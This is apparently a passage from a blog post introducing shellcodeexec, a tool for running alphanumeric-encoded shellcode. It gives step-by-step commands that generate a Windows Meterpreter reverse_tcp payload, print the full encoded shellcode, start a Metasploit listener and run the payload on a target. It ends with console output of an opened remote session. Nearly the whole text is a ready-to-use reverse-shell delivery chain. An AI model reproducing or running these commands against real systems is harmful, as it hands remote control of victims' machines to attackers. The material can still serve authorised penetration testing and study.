$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

[*] x86/alpha_mixed succeeded with size 634 (iteration=1)

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E
4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KR
ZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP
4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6Nk
VlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQ
xVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeR
pV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7
E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKO
N5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC
1KsVIO6OuZVCEXlISAA

2. Execute the Metasploit multi/handler listener on your machine. For example for a Windows target:

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Windows target:

C:\WINDOWS\Temp>shellcodeexec.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4L
KV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPP
RQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4Nk
EQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlR
kNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxV
SGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV
0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8N
yI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5L
KP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1Ks
VIO6OuZVCEXlISAA

If you head back to the terminal where the multi/handler is running you will happily see:

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUhread LPORT=4444 LHOST=192.168.136.1 E

[*] Please wait while we load the module tree...

[...]

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]

+ -- --=[ 673 exploits - 354 auxiliary

+ -- --=[ 217 payloads - 27 encoders - 8 nops

=[ svn r12306 updated 7 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp

EXITFUNC => thread

LPORT => 4444

LHOST => 192.168.136.1

[*] Started reverse handler on 192.168.136.1:4444

[*] Starting the payload handler...

[*] Sending stage (749056 bytes) to 192.168.136.129

[*] Meterpreter session 1 opened (192.168.136.1:4444 -> 192.168.136.129:1581) at Thu Apr 14 15:30:15 +0100 2011

meterpreter > sysinfo

System Language : en_US

OS : Windows .NET Server (Build 3790, Service Pack 2).

Computer : W2K3R2

Architecture : x86

Meterpreter : x86/win32

The tool along with compilation files for POSIX and Windows systems can be found on my GitHub at https://github.com/inquisb/shellcodeexec.
Thanks for reading